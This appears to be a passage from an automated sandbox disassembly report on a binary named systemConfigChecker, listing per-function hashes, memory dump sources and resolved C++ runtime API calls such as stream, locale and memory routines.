          • Instruction ID: 69ec6cdcc0f456767029caffa4d1cd976f607972568d749cb3dcf4bbd4e60637
          • Opcode Fuzzy Hash: f59fd3a113323076913b019393b9ca434df01870f7828c91c6ce386d03f2384e
          • Instruction Fuzzy Hash: A651E472A18B8181EB11CB69D4502AE73E1FB8AB98F504132EB4D93B58DFBDD189C704
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.1576590528.00007FF6B2701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B2700000, based on PE: true
          • Associated: 00000000.00000002.1576574673.00007FF6B2700000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576612753.00007FF6B270E000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576635338.00007FF6B2715000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576665489.00007FF6B2716000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ff6b2700000_systemConfigChecker.jbxd
          Similarity
          • API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Concurrency::cancel_current_taskFacet_Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterV42@@Vfacet@locale@2@std::_
          • String ID:
          • API String ID: 762505753-0
          • Opcode ID: d6b85af30ed1ec3ab35491ff2678aa002b6a93c38241c4489de49d361cb69296
          • Instruction ID: 0c2c579066fdaca7a8e6286071b42e80f738907ca3bcd52dad697cead52d925e
          • Opcode Fuzzy Hash: d6b85af30ed1ec3ab35491ff2678aa002b6a93c38241c4489de49d361cb69296
          • Instruction Fuzzy Hash: 2D31C732608B4581EB158F19E4401AA77A0FB9EF9CF480631EB9D87768DFBDE449C708
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.1576590528.00007FF6B2701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B2700000, based on PE: true
          • Associated: 00000000.00000002.1576574673.00007FF6B2700000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576612753.00007FF6B270E000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576635338.00007FF6B2715000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576665489.00007FF6B2716000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ff6b2700000_systemConfigChecker.jbxd
          Similarity
          • API ID: Locimp@locale@std@@$??0?$codecvt@_??4?$_Addfac@_Bid@locale@std@@D@std@@Init@locale@std@@Locimp@12@_Locimp@_Mbstatet@@@std@@New_V01@V123@V123@@Vfacet@23@_Yarn@malloc
          • String ID:
          • API String ID: 3292048638-0
          • Opcode ID: f87d893e3fb1d93d24334a2d4759e64544bcba3001e0ab39bcc40b4c639590f2
          • Instruction ID: 57d4672f8f4a1bfdb2c4f55dcfa6f7e3393398442e9556a3f715fee8f20b5113
          • Opcode Fuzzy Hash: f87d893e3fb1d93d24334a2d4759e64544bcba3001e0ab39bcc40b4c639590f2
          • Instruction Fuzzy Hash: 0A413F31928B5282E70ACB69E85033973E0FF4AB89F544135DB4E83760DFBDE1998348
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1576590528.00007FF6B2701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B2700000, based on PE: true
          • Associated: 00000000.00000002.1576574673.00007FF6B2700000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576612753.00007FF6B270E000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576635338.00007FF6B2715000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576665489.00007FF6B2716000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ff6b2700000_systemConfigChecker.jbxd
          Similarity
          • API ID: Concurrency::cancel_current_task
          • String ID:
          • API String ID: 118556049-3916222277
          • Opcode ID: b6637dcdd66c50c0683920060a48064bb7072bc3cfe5a88b8d918cdd62cc5f9d
          • Instruction ID: a4190825c93d8067fed42f3d1a830b9ce2d5c9fe9bb0edd8e5ad460167ae5281
          • Opcode Fuzzy Hash: b6637dcdd66c50c0683920060a48064bb7072bc3cfe5a88b8d918cdd62cc5f9d
          • Instruction Fuzzy Hash: 48516D72608B4596EB168F2ED45026D33A0FB49B98F544532CB4D83BA4DFBEE0A5C308
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.1576590528.00007FF6B2701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B2700000, based on PE: true
          • Associated: 00000000.00000002.1576574673.00007FF6B2700000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576612753.00007FF6B270E000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576635338.00007FF6B2715000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576665489.00007FF6B2716000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ff6b2700000_systemConfigChecker.jbxd
          Similarity
          • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
          • String ID:
          • API String ID: 1155477157-0
          • Opcode ID: 61f8509d56303d48883bdc27f9f7ac28063982bea9f0e33860e9bb2ac2d2f064
          • Instruction ID: 9f8469579cf7af1d4b89d65412bc6e84f2b7cd39bf5630b2c958cc71563659e2
          • Opcode Fuzzy Hash: 61f8509d56303d48883bdc27f9f7ac28063982bea9f0e33860e9bb2ac2d2f064
          • Instruction Fuzzy Hash: 4031E262B0965684FE169F1995003BE13C19B46FECF540A31DB2D87BC5EEBEE489C308
          Memory Dump Source
          • Source File: 00000000.00000002.1576590528.00007FF6B2701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B2700000, based on PE: true
          • Associated: 00000000.00000002.1576574673.00007FF6B2700000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576612753.00007FF6B270E000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576635338.00007FF6B2715000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576665489.00007FF6B2716000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ff6b2700000_systemConfigChecker.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: df8cf8428a73b2714442bbd637f092005021725c8ab47a6cba6d15f8a732e014
          • Instruction ID: d7e478c78b249ff464f7708513fc889bef265f83da6c8af7130731a204671bb7
          • Opcode Fuzzy Hash: df8cf8428a73b2714442bbd637f092005021725c8ab47a6cba6d15f8a732e014
          • Instruction Fuzzy Hash: 5331A632705B9286EE668F2AE4143BAA390FB49BD8F484435CF4D87750DE7DE49A8304
          APIs
          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF6B270107B), ref: 00007FF6B270B522
          • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6B270B538
            • Part of subcall function 00007FF6B270BCA4: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF6B270BCAD
            • Part of subcall function 00007FF6B270BCA4: _CxxThrowException.VCRUNTIME140(?,?,?,?,?,?,?,?,00007FF6B270B53D,?,?,?,00007FF6B270107B), ref: 00007FF6B270BCBE
          • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6B270B53E
          Memory Dump Source
          • Source File: 00000000.00000002.1576590528.00007FF6B2701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B2700000, based on PE: true
          • Associated: 00000000.00000002.1576574673.00007FF6B2700000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576612753.00007FF6B270E000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576635338.00007FF6B2715000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576665489.00007FF6B2716000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ff6b2700000_systemConfigChecker.jbxd
          Similarity
          • API ID: Concurrency::cancel_current_task$ExceptionThrowmallocstd::bad_alloc::bad_alloc
          • String ID:
          • API String ID: 594857686-0
          • Opcode ID: 238c82254a5a0dd3bfdcea07084a0eea4643be32c8ba11d6a235a5ec125aee32
          • Instruction ID: a14afb2f12b4422c0213e2626f979ae5de9606ac7018844dd2de5b300c2001a1
          • Opcode Fuzzy Hash: 238c82254a5a0dd3bfdcea07084a0eea4643be32c8ba11d6a235a5ec125aee32
          • Instruction Fuzzy Hash: 21E0EC40E1A21752FE6A2279251607B03C20F5B7B8E1C2B70EB7EC43C6AD9FA55D451C
          APIs
          • ?widen@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBADD@Z.MSVCP140 ref: 00007FF6B2709BE5
          • ?put@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@D@Z.MSVCP140 ref: 00007FF6B2709BF1
          • ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF6B2709BFA
          Memory Dump Source
          • Source File: 00000000.00000002.1576590528.00007FF6B2701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B2700000, based on PE: true
          • Associated: 00000000.00000002.1576574673.00007FF6B2700000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576612753.00007FF6B270E000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576635338.00007FF6B2715000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576665489.00007FF6B2716000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ff6b2700000_systemConfigChecker.jbxd
          Similarity
          • API ID: D@std@@@std@@U?$char_traits@V12@$?flush@?$basic_ostream@_?put@?$basic_ostream@?widen@?$basic_ios@U?$char_traits@_W@std@@@std@@
          • String ID:
          • API String ID: 2670548386-0
          • Opcode ID: a91e5c45519eb8f51b08b89dc2630a913814ba17e6fe4b3f6d8b063faadf772a
          • Instruction ID: 5808b4f1487e191a4562177f3425f5299c46a7d8d7daa6434fdcbdfd8b625c2a
          • Opcode Fuzzy Hash: a91e5c45519eb8f51b08b89dc2630a913814ba17e6fe4b3f6d8b063faadf772a
          • Instruction Fuzzy Hash: 7CD01221A4460683DA0D5F1AB8540352350AF4EF49B085431DE0F46310CD7DD45E8204
          APIs
          • ?widen@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEBA_WD@Z.MSVCP140 ref: 00007FF6B2709E05
          • ?put@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@_W@Z.MSVCP140 ref: 00007FF6B2709E11
          • ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF6B2709E1A
          Memory Dump Source
          • Source File: 00000000.00000002.1576590528.00007FF6B2701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B2700000, based on PE: true
          • Associated: 00000000.00000002.1576574673.00007FF6B2700000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576612753.00007FF6B270E000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576635338.00007FF6B2715000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576665489.00007FF6B2716000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ff6b2700000_systemConfigChecker.jbxd
          Similarity
          • API ID: U?$char_traits@_W@std@@@std@@$?flush@?$basic_ostream@_?put@?$basic_ostream@_?widen@?$basic_ios@_V12@V12@_
          • String ID:
          • API String ID: 2094784882-0
          • Opcode ID: 7bf1451799b23f1ce879a372c8a86a1a3bb4693dc89d3fb925bfda278d19c75c
          • Instruction ID: bdb0c808e2f0ff5e780d9aac76b4e5b6c6fd40c9b08e1abcdc7445ee0621050b
          • Opcode Fuzzy Hash: 7bf1451799b23f1ce879a372c8a86a1a3bb4693dc89d3fb925bfda278d19c75c
          • Instruction Fuzzy Hash: 30D05B24B4460683EE0D9F2ABC541352361DF4EF59B4C5030CE4F87310CD3DD49A8304
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.1576590528.00007FF6B2701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B2700000, based on PE: true
          • Associated: 00000000.00000002.1576574673.00007FF6B2700000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576612753.00007FF6B270E000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576635338.00007FF6B2715000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576665489.00007FF6B2716000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ff6b2700000_systemConfigChecker.jbxd
          Similarity
          • API ID: _fseeki64fgetpos
          • String ID:
          • API String ID: 3401907645-0
          • Opcode ID: 84d1aada89cd4f08e3bbf216dfcb77ee72de2ef28ea993f6e0146b415928d795
          • Instruction ID: da25efa6ed66b7208c9ed08f75dbabd8ba9a386ee2a45f155e239375efe00384
          • Opcode Fuzzy Hash: 84d1aada89cd4f08e3bbf216dfcb77ee72de2ef28ea993f6e0146b415928d795
          • Instruction Fuzzy Hash: AF314D72605B4181EB628F2AD56432A23E0FB59B9CF008131CF5CC7794EF79E49A8304
          APIs
          • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,00007FF6B2701A88), ref: 00007FF6B27075C6
          • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140(?,?,?,00007FF6B2701A88), ref: 00007FF6B27075D7
          Memory Dump Source
          • Source File: 00000000.00000002.1576590528.00007FF6B2701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B2700000, based on PE: true
          • Associated: 00000000.00000002.1576574673.00007FF6B2700000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576612753.00007FF6B270E000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576635338.00007FF6B2715000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576665489.00007FF6B2716000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ff6b2700000_systemConfigChecker.jbxd
          Similarity
          • API ID: D@std@@@std@@Init@?$basic_streambuf@U?$char_traits@fclose
          • String ID:
          • API String ID: 356833432-0
          • Opcode ID: baf789e10b114cee5e0dc2a749248d1481134e019c89cdd30f75a30e5dac250a
          • Instruction ID: 42d1538501c7694271381d887fc8c13b70e6d9f20eb103eb305e160d8e6e8878
          • Opcode Fuzzy Hash: baf789e10b114cee5e0dc2a749248d1481134e019c89cdd30f75a30e5dac250a
          • Instruction Fuzzy Hash: 0B21CE32A09B4185EB468F3EE4543A937A4F749F4CF048036CA4D8B368DF7AC49AC754
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.1576590528.00007FF6B2701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B2700000, based on PE: true
          • Associated: 00000000.00000002.1576574673.00007FF6B2700000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576612753.00007FF6B270E000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576635338.00007FF6B2715000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576665489.00007FF6B2716000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ff6b2700000_systemConfigChecker.jbxd
          Similarity
          • API ID: memcpy
          • String ID:
          • API String ID: 3510742995-0
          • Opcode ID: ff8da17e9ad61dbf7719b97cca7bcf2c3e620e3851f2e18b518f5e34869978b3
          • Instruction ID: 03b7b369dbfb37e818b9a7bba03e92a1297908af1eb69fa71413071151118b69
          • Opcode Fuzzy Hash: ff8da17e9ad61dbf7719b97cca7bcf2c3e620e3851f2e18b518f5e34869978b3
          • Instruction Fuzzy Hash: D5019E76B08B5481DA009F1AF20006EA3B1F789FC8B148972EF5C47B59DF79D5A28344
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.1576590528.00007FF6B2701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B2700000, based on PE: true
          • Associated: 00000000.00000002.1576574673.00007FF6B2700000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576612753.00007FF6B270E000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576635338.00007FF6B2715000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576665489.00007FF6B2716000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ff6b2700000_systemConfigChecker.jbxd
          Similarity
          • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
          • String ID:
          • API String ID: 313767242-0
          • Opcode ID: b33f0b59232ef77628a0e21157c01a396e23f4d8de78da469aa8954c23b2d4cb
          • Instruction ID: c7d0d002384112a2ad07fac08acc290f58b99fd556a1ba713c463dd75d2e8758
          • Opcode Fuzzy Hash: b33f0b59232ef77628a0e21157c01a396e23f4d8de78da469aa8954c23b2d4cb
          • Instruction Fuzzy Hash: E1319372608B8186EB658F64E8407EE73A0FB86308F04403ADB4D83B94DF79D54CC714
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.1576590528.00007FF6B2701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B2700000, based on PE: true
          • Associated: 00000000.00000002.1576574673.00007FF6B2700000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576612753.00007FF6B270E000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576635338.00007FF6B2715000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576665489.00007FF6B2716000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ff6b2700000_systemConfigChecker.jbxd
          Similarity
          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
          • String ID:
          • API String ID: 2933794660-0
          • Opcode ID: 26322efcc4006b2a3fbf51e2f5d46ec533835fa6bb93ff54a7596d062d660e14
          • Instruction ID: 74c04a5d5d9e3d4740e484773aea4a2178ca1954e3c487f7ef612eeef14d16e7
          • Opcode Fuzzy Hash: 26322efcc4006b2a3fbf51e2f5d46ec533835fa6bb93ff54a7596d062d660e14
          • Instruction Fuzzy Hash: 25111832B14B018AEB00CBA4E8552A933A4FB5A758F441E35DB6D867A4DFB8D5998380
          Memory Dump Source
          • Source File: 00000000.00000002.1576590528.00007FF6B2701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B2700000, based on PE: true
          • Associated: 00000000.00000002.1576574673.00007FF6B2700000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576612753.00007FF6B270E000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576635338.00007FF6B2715000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576665489.00007FF6B2716000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ff6b2700000_systemConfigChecker.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 7219aed77cf3d566d0c56852d0d3a0fd15ec5d75e91c4be2dfb621eecc1fe0a9
          • Instruction ID: 3b4a285beadc1102413f7d948eb5e36de4daf554bf5d73a1c001185f444c697b
          • Opcode Fuzzy Hash: 7219aed77cf3d566d0c56852d0d3a0fd15ec5d75e91c4be2dfb621eecc1fe0a9
          • Instruction Fuzzy Hash: D5A0026190CC0AD1E6468B08E85453333B0FB6674CB504536E60EC11A0DFFEA819C30C
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.1576590528.00007FF6B2701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B2700000, based on PE: true
          • Associated: 00000000.00000002.1576574673.00007FF6B2700000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576612753.00007FF6B270E000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576635338.00007FF6B2715000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576665489.00007FF6B2716000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ff6b2700000_systemConfigChecker.jbxd
          Similarity
          • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn$memcpy$?out@?$codecvt@Mbstatet@@Mbstatet@@@std@@
          • String ID:
          • API String ID: 4130688501-0
          • Opcode ID: 2b9501c16fc8f87c1c24aa571445dab11a5c62af2750a3bf7ecf3f5afa55e55d
          • Instruction ID: aef593bc84a90278f099fa30ed0466a9a711412b80fb425117ee569a75608680
          • Opcode Fuzzy Hash: 2b9501c16fc8f87c1c24aa571445dab11a5c62af2750a3bf7ecf3f5afa55e55d
          • Instruction Fuzzy Hash: C3D1C322F19B4285EB02CB68D4503BE23A1AB4A79CF404671DF5D92BD5DFBDE5898308
          APIs
          • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF6B270986D
          • ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF6B270988D
          • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF6B270989D
          • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF6B27098FD
          • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF6B2709926
          • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF6B270995D
          • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF6B27099A1
          • ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF6B27099A8
          • ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF6B27099B5
          Memory Dump Source
          • Source File: 00000000.00000002.1576590528.00007FF6B2701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B2700000, based on PE: true
          • Associated: 00000000.00000002.1576574673.00007FF6B2700000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576612753.00007FF6B270E000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576635338.00007FF6B2715000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576665489.00007FF6B2716000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ff6b2700000_systemConfigChecker.jbxd
          Similarity
          • API ID: ?sputc@?$basic_streambuf@D@std@@@std@@U?$char_traits@U?$char_traits@_W@std@@@std@@$?good@ios_base@std@@$?flush@?$basic_ostream@_?setstate@?$basic_ios@_?uncaught_exception@std@@Osfx@?$basic_ostream@_V12@
          • String ID:
          • API String ID: 569342377-0
          • Opcode ID: 37b8ee53cb8b00479985113fba4434682f5c23c40aa0f0a0174690d29aea351c
          • Instruction ID: b28e5601730f11c4a4d70c32122c942511427e1d8523077fd5cdb91b37f3babf
          • Opcode Fuzzy Hash: 37b8ee53cb8b00479985113fba4434682f5c23c40aa0f0a0174690d29aea351c
          • Instruction Fuzzy Hash: 4E514432A09A81C6EB118F19D5D0139B7E0FB85F99B158531CF5E877A0CF7AD45AC344
          APIs
          • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF6B270B2B5
          • ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF6B270B2D5
          • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF6B270B2E5
          • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF6B270B32C
          • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140 ref: 00007FF6B270B359
          • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF6B270B37A
          • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF6B270B3C0
          • ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF6B270B3C7
          • ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF6B270B3D4
          Memory Dump Source
          • Source File: 00000000.00000002.1576590528.00007FF6B2701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B2700000, based on PE: true
          • Associated: 00000000.00000002.1576574673.00007FF6B2700000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576612753.00007FF6B270E000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576635338.00007FF6B2715000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576665489.00007FF6B2716000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ff6b2700000_systemConfigChecker.jbxd
          Similarity
          • API ID: D@std@@@std@@U?$char_traits@U?$char_traits@_W@std@@@std@@$?good@ios_base@std@@?sputc@?$basic_streambuf@$?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@Osfx@?$basic_ostream@_V12@
          • String ID:
          • API String ID: 1135186806-0
          • Opcode ID: b45920d080d8d4678659f56451c6e88468ea0ecd66730601f2742ce8c786c4e1
          • Instruction ID: ffb304ac25aa81f592369a7bbc755b8d519c57ce2873af4c867d0beb6a82d262
          • Opcode Fuzzy Hash: b45920d080d8d4678659f56451c6e88468ea0ecd66730601f2742ce8c786c4e1
          • Instruction Fuzzy Hash: 52512332608A4182EB218F1ED59023EA7E1FB86F99B15D531DF5E83764CF7ED54A8308
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.1576590528.00007FF6B2701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B2700000, based on PE: true
          • Associated: 00000000.00000002.1576574673.00007FF6B2700000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576612753.00007FF6B270E000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576635338.00007FF6B2715000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576665489.00007FF6B2716000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ff6b2700000_systemConfigChecker.jbxd
          Similarity
          • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task$?in@?$codecvt@Mbstatet@@Mbstatet@@@std@@memcpy
          • String ID:
          • API String ID: 281699261-0
          • Opcode ID: c32ee648c69035889f8e0650f685f1d6b72f3f4abed251812f6324048fb66d7b
          • Instruction ID: bb5903554fc138b146019cb72087224d8f42ef150c564a74ac538b6f41e12773
          • Opcode Fuzzy Hash: c32ee648c69035889f8e0650f685f1d6b72f3f4abed251812f6324048fb66d7b
          • Instruction Fuzzy Hash: D3B1B062F18A45D5EB01CB68D4543AE33A1EB4AB9CF404631DB5D93BD8EFB9D188C348
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.1576590528.00007FF6B2701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B2700000, based on PE: true
          • Associated: 00000000.00000002.1576574673.00007FF6B2700000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576612753.00007FF6B270E000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576635338.00007FF6B2715000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576665489.00007FF6B2716000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ff6b2700000_systemConfigChecker.jbxd
          Similarity
          • API ID: fgetc
          • String ID:
          • API String ID: 2807381905-0
          • Opcode ID: f0efb582e9fd0d0aec3b92626ce79b77502db8850f48cde8c95ecbadf30f19f3
          • Instruction ID: f923fd33925cb57aff0a09b9865b428317999b0fb4191fc93befdd064a0ef571
